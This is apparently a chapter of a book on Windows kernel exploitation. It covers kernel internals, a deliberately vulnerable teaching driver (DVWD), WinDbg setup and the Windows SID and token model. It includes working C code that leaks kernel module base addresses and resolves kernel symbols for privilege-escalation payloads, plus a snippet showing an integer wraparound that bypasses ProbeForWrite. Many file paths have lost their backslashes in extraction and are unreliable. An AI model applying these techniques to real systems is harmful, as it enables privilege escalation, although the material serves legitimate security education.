Chapter 6 Windows

Information in this Chapter

  • Windows Kernel Overview

  • The Execution Step

  • Practical Windows Exploitation

Introduction

Trustworthy computing memo from Bill Gates 1 — 1/15/2002

[ … ]

Every week there are reports of newly discovered security problems in all kinds of software, from individual applications and services to Windows, Linux, Unix and other platforms. We have done a great job of having teams work around the clock to deliver security fixes for any problems that arise. Our responsiveness has been unmatched - but as an industry leader we can and must do better. Our new design approaches need to dramatically reduce the number of such issues that come up in the software that Microsoft, its partners and its customers create. We need to make it automatic for customers to get the benefits of these fixes. Eventually, our software should be so fundamentally secure that customers never even worry about it.

[ … ]

In the past, we've made our software and services more compelling for users by adding new features and functionality, and by making our platform richly extensible. We've done a terrific job at that, but all those great features won't matter unless customers trust our software. So now, when we face a choice between adding features and resolving security issues, we need to choose security.

Nine years have passed since the famous “memo” written by Bill Gates was sent to all of Microsoft's employees. From that point onward, beginning with the release of Windows XP SP2, Windows operating system security has improved dramatically across the board. When the memo was released, the number of exploitable critical vulnerabilities affecting Windows products had reached a perilous threshold, forcing Microsoft to focus its efforts on improving overall system security. Consolidated methods such as Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR), which other operating systems had already adopted, combined with the enforcement of such concepts as the “principle of least privilege,” and a newfound emphasis on the “secure by default” mantra thereafter were strongly incorporated into the Windows world.

Not surprisingly, as the Windows OS as a whole changed to accommodate a more security-minded posture, the Windows kernel also evolved in terms of both functionality and security. In this chapter, we will look at a few common Windows kernel vulnerabilities, discover how to exploit them, and discuss how recent changes in the kernel have influenced both exploitation vectors and kernel payloads.

Before we continue, let's talk about the various Windows releases from a kernel perspective. Historically speaking, Windows OSes have been promoted as either server or desktop releases; as we will see, however, this separation is not reflected at the underlying kernel level.

Omitting the earlier Windows releases (which are no longer used today), we can consider the kernel underlying Windows 2000 (formally known as Windows NT 5.0) to be the first release of the second generation of NT kernels. Most of the functionalities and kernel interfaces that were present in this release were to highly influence every Windows version introduced thereafter. In 2001, Windows NT/2000 was merged with the old Windows desktop product to give life to Windows XP (formally known as Windows NT 5.1). Similarly, the server market was invaded a few years later by the immensely popular Windows Server 2003 (formally known as Windows NT 5.2). At the time of this writing, and despite the fact that mainstream support is coming to an end, Windows Server 2003 still remains the most prevalent server solution in the Microsoft world. Between the end of 2003 and the beginning of 2007, Microsoft released a few service packs for Windows XP and Windows Server 2003; Windows XP SP2 and Windows Server 2003 SP1 introduced certain security enhancements in such a way that many people have come to consider those service packs to be the equivalent of new releases of their respective operating systems.

At the end of 2006, Microsoft released a new mainstream operating system, Windows Vista (formally known as Windows NT 6.0). With Windows Vista, a few kernel components were completely rewritten, and many internal kernel structures were changed in a substantial way, such that we could consider this kernel to be part of a new mainstream branch from an exploitation point of view as well.

Finally, Microsoft released the most recent version of Windows to date, Windows 7 (formally known as Windows NT 6.1), intended as a desktop solution, as well as Windows Server 2008 R2, an enhanced version of the Windows Server 2008 product available only for 64-bit platforms.

In addition to the Windows release version, we must also take into account another very important aspect: the processor on which the operating system is to run. With the introduction of Windows XP (with Windows XP x64) and Windows Server 2003, Microsoft began to support 64-bit processors, both Itanium and x86-64 based. As is to be expected, every 64-bit release of the Windows kernel runs in a fully 64-bit environment (although backward support has been maintained for legacy 32-bit applications on x86-64 architectures). Since there were no legacy 64-bit applications or drivers, Microsoft was not forced to maintain backward compatibility, so it began to insert interesting new features and APIs, both in user land and in kernel land, such as disposal of stack-based structured exception handling, the introduction of table-based unwind exception handling, permanent DEP, and Kernel Patch Protection (KPP), among others.

After taking all of this into account, and in an attempt to avoid being repetitious, in this chapter we will analyze only two of the aforementioned kernels: the one installed with Windows Server 2003 SP2 (32-bit version, kernel NT 5.2), and the one installed with Windows Server 2008 R2 SP2 (64-bit version, kernel NT 6.1). You can apply most of the descriptions related to the NT 5.1 kernel to all members of the NT 5.x mainstream family; the same is true for the NT 6.1 kernel with respect to the NT 6.x Windows family. Let's now move on to a brief and concise description of the Windows NT kernel, as well as a discussion of the debugging environment we will need to build to analyze our example exploitation scenarios.

Windows Kernel Overview

The Windows kernel is essentially a monolithic kernel, such that the core of the operating system and the device drivers share the same memory address space, all running together at the highest possible privilege level (Ring 0 on x86/x86-64). The first component we will look at—and the one that we are most interested in—is the Kernel Executive. This component implements the basic OS functions: processes, threads, virtual memory, interrupt and trap handling, exception management, cache management, I/O management, asynchronous procedure calls, the Registry, object management, events (a.k.a. synchronization primitives), and many other low-level interfaces. The Kernel Executive is implemented in Ntoskrnl.exe, whose binary image is in the C:WINDOWSSYSTEM32 directory path. It bears mentioning that separate uniprocessor and multiprocessor versions of the kernel still exist; moreover, on 32-bit systems there are also different kernels based on Physical Address Extension (PAE), as shown in Table 6.1, which summarizes all of the kernel names together with the context in which they are used.

Table 6.1 Different kernels

Kernel Filename Original Filename (UP) Original Filename (SMP)
Ntoskrnl.exe Ntoskrnl.exe Ntkrnlmp.exe
Ntkrnlpa.exe (PAE) Ntkrnlpa.exe Ntkrpamp.exe

The other important kernel component we'll look at is the Hardware Abstraction Layer (HAL), which is responsible for device driver and Kernel Executive isolation from platform-specific hardware differences. The HAL is implemented within the hal.dll module, and there are different versions of the HAL with regard to the Kernel Executive, depending on whether one is on a uniprocessor or a multiprocessor system. The remaining components are loaded as kernel drivers (or as modules) into the running kernel—for example, win32k .sys implements the kernel side of the Windows subsystem and the GUI of the operating system, while tcpip.sys implements most of the TCP/IP networking stack.

Kernel Information Gathering

Sometimes kernel version differences can have an impact on the exploitation vector we intend to use. To make sure we are approaching the issue properly, we will need to know which system configuration we are working with. In line with this goal, the first important thing we need to obtain is the correct operating system version. To determine this, when dealing with a local privilege escalation exploit we can query the system itself for the operating system version via the GetVersionEx() API. This function will return the major, minor, and build numbers in an OSVERSIONIFO structure. You can use the following code from a user-land process to detect the Windows OS version:

VOID GetOSVersion(PDWORD major, PDWORD minor, PDWORD build)

{

OSVERSIONINFO osver;

ZeroMemory(&osver, sizeof(OSVERSIONINFO));

osver.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);

GetVersionEx(&osver);

if(major)

*major = osver.dwMajorVersion;

if(minor)

*minor = osver.dwMinorVersion;

if(build)

*build = osver.dwBuildNumber;

}

Sometimes, in addition to knowing the OS version, we need to know the exact Kernel Executive version (patch level), as well as the environment on which it is running (UP/SMP, 64/32, PAE/not PAE). Merely looking at the Kernel Executive filesystem name is not enough, since the name of the kernel on disk is always taken from the uniprocessor kernel version (i.e., it will always be either Ntoskrnl .exe or Ntkrnlpa.exe).

To acquire more information about the installed kernel image, we can look at the kernel binary properties: original filename and file version, as shown in Figure 6.1.

Image

Figure 6.1 Executive kernel name and version.

If more than one kernel binary is installed, we'll need to rely on the loaded modules/drivers list to discover which binary is the running Kernel Executive. Along with kernel module names, we will also discover the base virtual memory address of each module. After we have pinpointed the exact base addresses of all of the kernel modules, we can subsequently and easily relocate any symbols we wish (e.g., we can resolve all drivers’ exported functions). To extract the module list, we need to use the partially documented NtQuerySystemInformation() kernel API. This function is used to retrieve a few pieces of operating system information, such as system performance information and process information. The function prototype is as follows:

NTSTATUS WINAPI NtQuerySystemInformation(

__in SYSTEM_INFORMATION_CLASS SystemInformationClass,

__inout PVOID SystemInformation,

__in ULONG SystemInformationLength,

__out_opt PULONG ReturnLength

);

To reach our objective, we will need to call the function, passing the undocumented SystemModuleInformation SYSTEM_INFORMATION_CLASS parameter. The API can be called by an unprivileged process, and returns an array of structures holding SYSTEM_MODULE_INFORMATION_ENTRY entries, as shown in the following code snippet:

BOOL GetKernelBase(PVOID* kernelBase, PCHAR kernelImage)

{

_NtQuerySystemInformation NtQuerySystemInformation;

PSYSTEM_MODULE_INFORMATION pModuleInfo;

ULONG i,len;

NTSTATUS ret;

HMODULE ntdllHandle;

ntdllHandle = GetModuleHandle(_T("ntdll")); [1]

if(!ntdllHandle)

return FALSE;

NtQuerySystemInformation =

GetProcAddress(ntdllHandle,"NtQuerySystemInformation"); [2]

if(!NtQuerySystemInformation)

return FALSE;

NtQuerySystemInformation(SystemModuleInformation, [3]

NULL,

0,

&len);

pModuleInfo =

(PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len); [4]

NtQuerySystemInformation(SystemModuleInformation, [5]

pModuleInfo,

len,

&len);

#ifdef _K_DEBUG

for(i=0; i < pModuleInfo->Count; i++) [6]

{

printf("[*] Driver Entry: %s at %p ",

pModuleInfo->Module[i].ImageName,

pModuleInfo->Module[i].Base);

}

#endif

strcpy(kernelImage, pModuleInfo->Module[0].ImageName); [7]

*kernelBase = pModuleInfo->Module[0].Base; [8]

return TRUE;

}

The GetKernelBase() function opens a handle to the ntdll.dll library using the dynamic runtime linking interface. Since this function has no associated import library, we are forced to use the GetModuleHandle() [1] and GetProcAddress() [2] functions to dynamically obtain the address of the NtQuerySystemInformation() function within the ntdll.dll library memory address range. At [3], the NtQuerySystemInformation() function is called, with the SystemInformationLength parameter set to 0. In this manner, we can get the needed size of the buffer, which is pointed at by SystemInformation's arguments, that holds the SYSTEM_MODULE_INFORMATION_ENTRY array. After having allocated enough memory at [4], we will once again call the NtQuerySystemInformation() function, [5], with the correct parameters necessary to correctly fill the array. The loop at [6] scans and prints every entry for debugging purposes. The pModuleInfo->Module[N].ImageName holds the names of the modules, and pModuleInfo->Module[N].Base holds the virtual memory base address of the Nth module. The first (N == 0) module is always the Kernel Executive (e.g., Ntoskrnl.exe). The preceding code will produce output similar to the following on a Windows 2008 R2 64-bit system:

[*] Driver Entry: SystemRootsystem32 toskrnl.exe at FFFFF80001609000

[*] Driver Entry: SystemRootsystem32hal.dll at FFFFF80001BE3000

[*] Driver Entry: SystemRootsystem32kdcom.dll at FFFFF8000152D000

[*] Driver Entry: SystemRootsystem32PSHED.dll at FFFFF88000C8C000

[*] Driver Entry: SystemRootsystem32CLFS.SYS at FFFFF88000CA0000

[…]

After discovering the correct base address of the Kernel Executive, we will be able to relocate whichever exported function we'd like to move by simply loading the same binary image in user land and relocating the relative virtual address (RVA) using the real kernel base address leaked by that function. Do not confuse RVAs with virtual memory addresses. An RVA is a virtual address of an object (a symbol) from the binary file after being loaded into memory, minus the actual base address of the file image in memory. To convert an RVA to the corresponding virtual address, we have to add the RVA to the corresponding module image base address. The procedure to relocate Kernel Executive functions, hence, is straightforward. We have to load the kernel image into user-mode address space via the LoadLibrary() API, and then pass the HMODULE handle to a function which resolves the RVA, as shown in the following code:

FARPROC GetKernAddress(HMODULE UserKernBase,

PVOID RealKernelBase,

LPCSTR SymName)

{

PUCHAR KernBaseTemp = (PUCHAR)UserKernBase;

PUCHAR RealKernBaseTemp = (PUCHAR)RealKernelBase;

PUCHAR temp = (PUCHAR)GetProcAddress(KernBaseTemp, SymName); [1]

if(temp == NULL)

return NULL;

return (FARPROC)(temp - KernBaseTemp + RealKernBaseTemp); [2]

}

The preceding function takes three parameters: UserKernBase is the HMODULE returned by the LoadLibrary() API, RealKernelBase is the kernel base address obtained through NtQuerySystemInformation(), and SymName is the name of the exported symbol we want to resolve. At [1], the function gets the address of the symbol relocated in user space, and at [2], the function subtracts the base address of the module to get the RVA. At this point, the RVA is added to the kernel base to compute the symbol's final virtual address. We will need a few of the Kernel Executive's exported functions to construct a portable local privilege escalation kernel payload; if necessary, however, we will also be able to extract any symbols we might need from any other driver modules that might be available (e.g., hal.dll, kdcom.dll, etc.).

Introducing DVWD: Damn Vulnerable Windows Driver

Most of the vulnerabilities discussed in the rest of this book involve the exploitation of real-world bugs that have been found in the wild. In this chapter, we chose to take a different approach, and instead created a simple and straightforward Windows driver that contains a few of the most common basic vulnerabilities one is likely to encounter from a general standpoint. In real-world drivers, of course, things will vary among drivers (and among exploits), but the main concepts and techniques that we will explore in this chapter can be applied as is to real-world vulnerability scenarios.

You can download the dummy driver we will be analyzing from the book's Web site at www.attackingthecore.com. The code compiles well on both Windows Server 2003 Server 32-bit systems and Windows Server 2008 R2 64-bit systems using the latest Windows Driver Kit (WDK), which you can download from Microsoft's Web site (at no cost) at www.microsoft.com/whdc/devtools/wdk/RelNotesW7.mspx.

Tools & Traps…

WDK: The Windows Driver Kit

The Windows Driver Kit is the most powerful and complete environment currently available for building kernel device drivers. With the WDK, we can build device drivers for both 32-bit and 64-bit Windows operating systems—ranging from Windows XP to the latest releases of both Windows 7 and Windows Server 2008 R2. The WDK includes not only the compiler and the linker, but also all of the kernel headers, along with various interesting and useful tools.

With the WDK, we can build device drivers for every NT 5.x system (except Windows 2000) and NT 6.x system on the market. For older Windows versions (which we will not be covering here), one would need to download the Driver Development Kit (DDK), which was the old build environment for such tasks. Old releases of the WDK and DDK are available via the Microsoft WDK Connect site. Build instructions for compiling and installing the kernel module are provided on this book's Web site, www.attackingthecore.com.

The dummy driver created for use in this chapter, DVWD, is composed primarily of three files: Driver.c, StackOverflow.c, and Overwrite.c. A brief description of each of these files follows:

  • The Driver.c file is responsible for initializing a virtual device. It creates the \.DVWD device, and registers two vulnerable IOCTL handlers. The first handler will be invoked when the control code DEVICEIO_DVWD_STACK_OVERFLOW has been specified; the second handler is invoked when the DEVICEIO_DVWD_OVERWRITE control code has been used.

  • The StackOverflow.c and Overwrite.c files hold the vulnerable code. StackOverflow.c hosts the handler that is invoked when the DEVICEIO_DVWD_STACK_OVERFLOW control code has been used. This handler is vulnerable to a straightforward stack-based buffer overflow attack. Overwrite.c hosts the related DEVICEIO_DVWD_OVERWRITE handler. This handler is vulnerable to a so-called kernel memory arbitrary overwrite vulnerability, allowing the attacker to arbitrarily write data inside the kernel's virtual memory. This type of vulnerability is very common in third-party drivers written for Windows, including many antivirus and host-based intrusion detection system (IDS) products.

Kernel Internals Walkthrough

To better understand the sample DVWD code, we will first need to introduce a few core Windows kernel concepts, namely, Device I/O Control implementation, I/O Request Packet (IRP) dispatching, and the method by which data is accessed via the user-mode interface.

Device I/O Control and IRP Dispatching

We can look at the DeviceIoControl() API as being similar to an ioctl() call on UNIX-like systems, such as we discussed in the preceding chapter. This function sends a control code directly to a specific device driver to perform a corresponding operation. Usually, along with the control code, a process will also send custom data that the driver handler must interpret correctly. This is the DeviceIoControl() prototype:

BOOL WINAPI DeviceIoControl( HANDLE hDevice,

DWORD dwIoControlCode,

LPVOID lpInBuffer,

DWORD nInBufferSize,

LPVOID lpOutputBuffer,

DWORD nOutBufferSize,

LPDWORD lpBytesReturned,

LPOVERLAPPED lpOverlapped);

The function takes a few parameters, the most important ones being the device driver HANDLE, the I/O control code, and the addresses of the input and output buffers. When the function returns, a synchronous operation takes place in which the DWORD addressed by the lpBytesReturned pointer will hold the size of the data stored in the output buffer. Finally, lpOverlapped holds the address of an OVERLAPPED structure that is to be used during asynchronous requests; according to the dwIoControlcode parameter, the input and output buffers addressed by lpInBuffer and lpOutBuffer could be NULL.

When the user mode issues a call through the DeviceIoControl() API, the I/O Manager (which is within the Kernel Executive module) creates an IRP and delivers it to the device driver. An IRP, a structure that encapsulates the I/O request and maintains a request status, is then passed through the driver's stack until a driver can fully or partially handle it; it can be processed synchronously or asynchronously, and can be sent to a lower driver or even cancelled during its processing. The I/O Manager can automatically create an IRP in response to a user-mode process operation (such as a call to the DeviceIoControl() routine), or a high-level driver can create it within the kernel to be able to communicate with a lower-level driver.

By assuming that the I/O Manager has generated the I/O Request Packet during a DeviceIoControl() from a user-mode process, we can simplify the description—provided, of course, that the addresses of memory pages passed within the IRP will always belong to the user-mode address space.

But how, then, is the kernel able to access user address space, and how is it possible for data to be copied into kernel memory? There are three types of data transfer mechanisms: Buffered I/O, Direct I/O, and Neither Buffered nor Direct I/O.

Buffered I/O is the simplest mechanism; in Buffered I/O, the I/O Manager directly copies the input data from user space into a kernel buffer and then passes the buffer to the handler. The I/O Manager is also responsible for copying data back into the user-mode output buffer that is being addressed. With Buffered I/O, the device driver can directly read the input buffer and write to the output buffer without further checks (other than for size), since the buffer already resides within the kernel address space. Things are handled a bit differently when Direct I/O transfer is used. In this case, the I/O Manager initializes and passes to the device driver handler a memory descriptor list (MDL) describing the requested user-mode buffer. The MDL is an opaque internal structure that is used to describe a set of physical pages. A driver that performs Direct I/O transfer has to create a local virtual kernel mapping before it is able to access target pages. After having properly locked and mapped the MDL into the kernel address space, the driver will be able to directly access the associated pages.

The Neither Buffered nor Direct I/O method, as the name suggests, simply uses neither the Buffered I/O nor the Direct I/O method; instead, the device driver is able to access user-mode buffers directly. Since this is the only way in which complex structures may be passed, a lot of third-party drivers use this method to pass their custom data structures along to their corresponding device driver(s). All of the code samples within the DVWD utilize this method. As one might expect, since this method requires the management of untrusted data within an untrusted environment (the user address space), a few more security checks are required. The driver must check the virtual address range and its permissions while at the same time not making any assumptions about the content of—or even the existence of—any user-mode buffers while accessing it. It is now time to take a look at how a driver should operate so that it can access user address space properly.

User to Kernel/Kernel to User

Accessing user-mode buffers directly from kernel mode can be a very dangerous practice from a security perspective. But why is this? And what does a well-written device driver have to do to access user-mode address space correctly, thereby avoiding any untoward security issues? This is a key concept we will need to understand to fully comprehend the exploitation vectors we will be coming across in a Windows environment.

What follows constitutes a typical snippet of code showing how a driver is able to directly access the user-space buffer by way of a kernel routine:

__try

{

ProbeForRead(userBuffer, len, TYPE_ALIGNMENT(char));

RtlCopyMemory(kernelBuffer, userBuffer, len);

} __except(EXCEPTION_EXECUTE_HANDLER)

{

ret = GetExceptionCode();

}

The preceding code simply copies a user-land buffer into a kernel-space buffer. All of the code is enclosed within a __try/__except block, which is used to manage software exceptions. The __try/__except blocks are mandatory when dealing with user-land pointers. (We will discuss the implementation of exception blocks and the exception dispatching mechanism in the section “Practical Windows Exploitation,” later in this chapter). Moving on to the code within the __try/__except block, pointers that address hypothetical user-mode address space (such as userBuffer in the preceding example) must always be checked—otherwise, it would be possible for an evil user-mode process to pass an invalid pointer capable of addressing kernel pages. Windows provides two kernel function primitives that we can use to validate the user-mode-supplied buffers: ProbeForRead() and ProbeForWrite(). The prototype of ProbeForRead() is as follows:

VOID ProbeForRead(CONST VOID *Address,

SIZE_T Length,

ULONG Alignment);

The Address specifies the beginning of the user-mode buffer, the Length parameter specifies the length in bytes, and the Alignment is the required address alignment. This function verifies that the buffer is actually confined within the user address space.

Note

The user-land virtual address space on Windows takes up the first linear 2GB on 32-bit processes when running on top of 32-bit kernels (the first 3GB if the /3GB split option is specified on the boot command line). It takes the first linear 4GB on 32-bit processes when running on top of 64-bit kernels. And it takes up the first linear 8TB on 64-bit native processes running on top of 64-bit kernels (×64).

As we can see, the ProbeForRead() function is placed inside a __try/__except exception block. The function, in fact, will return successfully only if the buffer is actually confined within the user address space; if it falls outside this area, an exception is triggered and the already mentioned except block must intercept it. There are two important matters that we need to address about this function. The first matter is related to the access check implementation. This function does not access the user-mode buffer at all—it merely verifies that the buffer is within the correct range and that the supplied pointer is correctly aligned. What happens if the buffer is valid but the user-land range is not fully mapped? Any such buffers would successfully be able to pass the test, since an exception wouldn't be triggered until later, when the driver reads the buffer. Passing a partially invalid buffer to the kernel, however, is not the only way to trigger the exception; an evil thread is always capable of deleting, substituting, or changing the protection of the user address space even after the probe call.

The other interesting matter regards the Length parameter. If a zero-length parameter is passed to the function, it will return immediately without ever checking the source buffer. Although this behavior may at first seem logical, it can be abused—and sometimes exploited—if an integer overflow or an integer wraparound occurs during the length calculation. Take a look at the following piece of code:

__try {

ProbeForWrite(user_controlled_ptr,

sizeof(DWORD) + controlled_len, [1]

TYPE_ALIGEMENT(char));

*((DWORD *)user_controlled_ptr) = 0xdeadbeaf; [2]

user_controlled_ptr += sizeof(DWORD);

for(i=0; i<controlled_element; i++)

{

VOID *dest = user_controlled_ptr + sizeof(Object)*i;

[ … ]

In this example, the kernel needs to validate the user-supplied parameter user_controlled_ptr. Let us assume we are working in a 32-bit kernel environment. Provided we can also somehow arbitrarily control the controlled_len variable, the check executed at [1] can be bypassed using a value of 0xFFFFFFFC. Since sizeof(DWORD) is equal to 4, the final length is 0 (taking into account the unsigned integer wraparound). The ProbeForWrite() function will then immediately return without performing any further checks on the user_controlled_ptr address. What would happen if user_controlled_ptr were to hold a kernel-space address? The answer is straightforward: a partially controlled memory corruption (at [2]) would occur. This is a particularly common error that third-party drivers make often when dealing with user-mode buffer size. We will see in the section “Practical Windows Exploitation” how built-in exception handling is implemented and how we can abuse its inner logic to bypass stack overflow protections.

Tip

Different OSes use different approaches when dealing with user-space buffers. For example, the Linux kernel, on x86 systems, implements a set of internal APIs (copy_from_user(), copy_to_user(), etc.), which must always be called when dealing with user-space buffers. Since Linux does not implement any sort of software exception (such as structured exception handling [SEH]), it registers in a kernel table the addresses of all of the assembly instructions that reference user address space. When a page fault exception occurs, the kernel searches this table looking for an address that matches the faulty instruction pointer address. If it finds the address, it returns out of the exception handler and passes control to the corresponding fix-up routine, which in turn will force the API to return an error code. In this scenario, the device driver is not concerned with checking for an invalid user-mode address; instead, it simply invokes the API and checks the return value. This entire process is completely hidden from the driver perspective.

In the Windows world, however, as we have seen before, the device drivers are aware of exception handling and must perform proper user-space access checking inside an exception block to be able to manage a triggered exception. When performing kernel audits or writing kernel fuzzers, we must always take into account that within Windows the exception handler can be invoked at any time while in the __try/__except block. If multiple accesses are made to the user-mode address, the exception can provoke different behavior that the handler might not be able to account for. Moreover, since it is very uncommon for a user-mode process to pass an invalid pointer during a system call, the kernel code path that is handling the exception is not always well tested. When the exception handler deals with resources in the __try/__except exception block, it is not uncommon to find that poorly written code is leaking memory, double-freeing buffers, or attempting to use a buffer after it has already been freed.

Kernel Debugging

When dealing with kernel vulnerabilities, especially when the vulnerability concerns a memory corruption or a race condition that is difficult to trigger, a debugger is mandatory. Since we will be dealing with the output of several WinDbg commands throughout the remainder of this chapter, it is important that we set up our environment properly to be able to reproduce the analysis.

WinDbg is a powerful graphical interface debugger armed with many useful functions. It is highly versatile, and we can use it as both a fully featured source-level debugger and a binary-only reverse-engineering environment. In addition, we can use it for both user-mode application debugging as well as (and more importantly to us) kernel debugging. It fully supports Windows symbol files, and can be used quite satisfactorily to debug the Windows kernel. The kernel debugger is very versatile and can target all supported architectures (x86 32-bit, x86 64-bit, and Itanium). Not only can the debugger detect the target kernel without user intervention, but it also can be set up to automatically download the correctly synced symbol file from Microsoft's official symbol server. What follows is a simple description of how to set up WinDbg as a kernel debugger.

The kernel debugger is not usually run on the same system upon which the target kernel is running, but is instead generally connected to the target system via such external methods as a serial null modem cable or an IEEE-1394 FireWire connection. In the following example, we will bypass the hardware route and instead use a “virtual” null modem cable through a VMware-emulated serial line, with the target kernel running in VMware as a guest operating system.

Note

The use of VMware as a virtualization solution is not mandatory. Any other virtualization environment that supports serial line emulation (with polled mode support) can be used to debug a guest kernel through WinDbg.

First, we need to create a virtual serial line connection in the guest OS. We can do this by creating a new serial port in the Virtual Machine setting and flagging the Connect at power on checkbox. We need to set Use named pipe as the connection type and specify a path such as \.pipecom_1. We will also need to specify the options This end is the server and The other end is an application, as well as set the I/O Mode to Yield CPU on poll, as shown in Figure 6.2.

Image

Figure 6.2 Virtual machine setting.

The next steps for setting up the debugger regard the target kernel. We need to prepare the virtualized kernel to accept connections from the debugger. We can do this by simply adding a line to the C:oot.ini configuration file, as shown in the following snippet:

[boot loader]

timeout=30

default=multi(0)disk(0)rdisk(0)partition(1)WINDOWS

[operating systems]

multi(0)disk(0)rdisk(0)partition(1)WINDOWS="W2K3" /noexecute=optout /fastdetect

multi(0)disk(0)rdisk(0)partition(1)WINDOWS="W2K3-Debug"/noexecute=optout /fastdetect /debugport=com1 /baudrate=115200

As we can see, a new W2K3-Debug entry has been added, specifying the /debugport and /baudrate options. Alternatively, on NT 6.x kernels, we can enable kernel debugging on the currently running kernel configuration using the following command:

bcdedit /debug on

In either scenario, we will need to reboot the guest Windows OS to make our changes take effect.

The final step in setting up the kernel debugger involves configuring WinDbg to automatically download symbols from the Microsoft symbol server, and connect to the local pipe. We can invoke WinDbg in the following manner:

windbg -b -k com:pipe,port=\.pipecom_1,resets=0 -y

srv*C:W2K3Symbols*http://msdl.microsoft.com/download/symbols

In the preceding example, the -b option enables kernel-mode debugging, while the -k option specifies the kernel-mode connection type; here, we instructed WinDbg to use a serial protocol over the local pipe, \.pipecom_1. The -y option is used to specify the symbol file location, which starts with the substring srv*; it instructs WinDbg to connect to the remote symbol server—http://msdl.microsoft.com/download/symbols—and then store the results in the local C:W2K3Symbols directory. At this point, we are finished setting up WinDbg, and may now invoke it; if our setup was successful, we should see something similar to Figure 6.3.

Image

Figure 6.3 WinDbg.

There are essentially three main varieties of WinDbg commands: built-in commands, meta commands, and extensions. Built-in commands are built into the debugger. They are native commands that other components can reuse (for things such as reading memory and placing breakpoints). Meta commands are prefixed with a dot (e.g., .srcpath). Meta commands cover most aspects of the debugger environment. Finally, extension commands are more complex and are implemented within a debugger extension (external DLLs). Usually they exploit a mix of built-in commands to execute a complex task such as listing processes (!process), printing process page tree structures (!pte), inspecting the Page Frame Database (!pfn), and analyzing a crash dump (!analyze).

Regardless of which type of command we are dealing with, we can always access the proper Help documentation by executing the following meta command: .hh <command name>. When everything is set up properly we can start digging into kernel internals. Let's start.

The Execution Step

In this section, we will look at what we can do to escalate privileges after having taken control of a kernel control path flow. Although most examples and code in this section could be reused (if properly managed) within remote exploits, they are designed to work in a local privilege escalation scenario only. We will cover the subject of remote exploitation payloads extensively in Chapter 7.

Windows, unlike the UNIX OSes, has an intrinsically elaborate authentication and authorization model. A full analysis of this model—although quite interesting—would be rather impracticable and goes well beyond the scope of this book; therefore, here we will briefly discuss what you need to know regarding the authorization model to be able to build a working and reliable piece of shellcode payload. We also will cover the differences between the two targeted systems’ models—Windows Server 2003 (32-bit) and Windows Server 2008 (64-bit). For an excellent and in-depth discussion of the authentication and authorization model Windows uses, we refer you to Windows® Internals: Covering Windows Server® 2008 and Windows Vista®, Fifth Edition, by Mark E. Russinovich and David A. Solomon; this book is an invaluable reference for anybody interested in Windows system-level programming and vulnerability analysis.

Windows Authorization Model

Most Windows authorization is centered on three main concepts: the security descriptor, the security identifier (SID), and the access token. When dealing with Windows, we have to consider every system resource to be an object; files, directories, tokens, processes, threads, timers, mutexes, and so on are all objects. Even a process's shared memory segment (called a section) is treated as an object by the kernel. Every object has an associated security descriptor, a data structure specifying which principals can perform which actions on an object. The SID is used to identify entities that operate within the system. Every entity performing a login is associated with a list of SIDs and every process owned by the entity holds these SIDs within the process's access token. Every User, Local, and Domain group, every domain, and even every local computer has a SID value associated with it. When a process tries to access an object, the access check algorithm tries to determine if the given process can access the given resource by looking at the list of access control entries (ACEs) specified in the object's security descriptor, and comparing it with the list of SIDs present in the access token. An in-depth discussion of the access check algorithm, and the internal structure of the ACE and access control list (ACL), is beyond the scope of this book. The only thing we need to know here is that the SIDs are used in the access check algorithm to grant or deny access to a given object. If we can control the access token, and more specifically the list of SIDs within it, we can access every type of local resource.

Before we can finally begin to delve into the internals of the SID and access token structures, we need to introduce the last important authorization mechanism: Privileges. On Windows, a few actions are not related to any specific object but can interact with the system as a whole. These actions are performed only if a particular privilege is granted to the current process. For example, the ability to reboot or shut down the machine is governed by a specific privilege: SeShutdownPrivilege. Only processes in possession of this privilege are capable of shutting down the machine.

Every new version of Windows has introduced new privilege types; the most recent version of Windows at the time of this writing, Windows 7, has about 35 different privilege types. For the purposes of this discussion, we need to concern ourselves with only a few critical Privileges, called Super Privileges. Super Privileges are so powerful that a process in possession of just one of these types of Privileges is capable of completely compromising the system.

It is now time to delve into the details of SIDs, Privileges, and access token structures.

The Security Identifier (SID)

At first glance, we might be tempted to compare the Windows SID to the UNIX UID/GID; however, the SID is not related to user and group only. Not only is a SID associated with local Users and Groups, but a different SID is also assigned to Domain users, Domain groups, Computers, and so forth. Moreover, other special SIDs exist as well; examples include those that identify the authentication schema used by the logged-in user (NT AUTHORITYNTLM Authentication) and the logon type (NT AUTHORITYInteractive). In essence, we can say that a SID exists for every entity that can be used to grant or deny access to a principal.

The kernel uses the following data structure to represent the SID (Figure 6.4 shows an image of the SID):

Image

Figure 6.4 SID internal structure.

typedef struct _SID_IDENTIFIER_AUTHORITY

{

UCHAR Value[6];

} SID_IDENTIFIER_AUTHORITY, *PSID_IDENTIFIER_AUTHORITY;

typedef struct _SID

{

UCHAR Revision;

UCHAR SubAuthorityCount;

SID_IDENTIFIER_AUTHORITY IdentifierAuthority;

ULONG SubAuthority[1];

} SID, *PSID;

From the kernel's point of view, the SID is a variable-length structure composed of the following fields:

  • Revision

    The Revision field is a 1-byte-wide field holding the revision number, thereby telling the system how to manipulate the remainder of the structure. Currently, it holds the value 0x01. What follows it is relative to the SID structure identified by the current revision number (0x01).

  • SubAuthorityCount

    The SubAuthorityCount is a 1-byte-wide field holding the number of subauthorities; the token can virtually have up to 255 subauthorities (actually they are limited to 15).

  • IdentifierAuthority

    The IdentifierAuthority is a 48-bit field created by an array of six bytes that identifies the highest level of authority that can issue SIDs for this particular type of principal.

    There are many different possible authority values. A few of them are:

    • World Authority (1)—Used by the Everyone principal

    • NT Authority (5)—Used when the SID is released by Windows Security Authority

    • Mandatory Label Authority (16)—Used for the integrity level SID

  • SubAuthority

    The SubAuthority is a variable-length array of type ULONG containing the series of subauthority values. The first part (and the majority) of the series—that is, all of the subauthorities except for the final one—is considered part of the domain identifier, whereas the final element in the series is called the relative identifier (RID). The RID is 4 bytes wide, and is what distinguishes one account from another within the same domain (or within the local computer). Every account or group has a different RID within the same domain. Usually RIDs for normal User and Group accounts start at 1,000 and increase for each new User/Group; moreover, there are many built-in RIDs. Table 6.2 shows a few of them.

    Table 6.2 Well-known RIDs

    RID SID Subject
    544 S-1-5-32-544 BUILTIN Local Admin Group
    545 S-1-5-32-545 BUILTIN Local User Group
    500 S-1-5-domain-500 Administrator User

Special SIDs

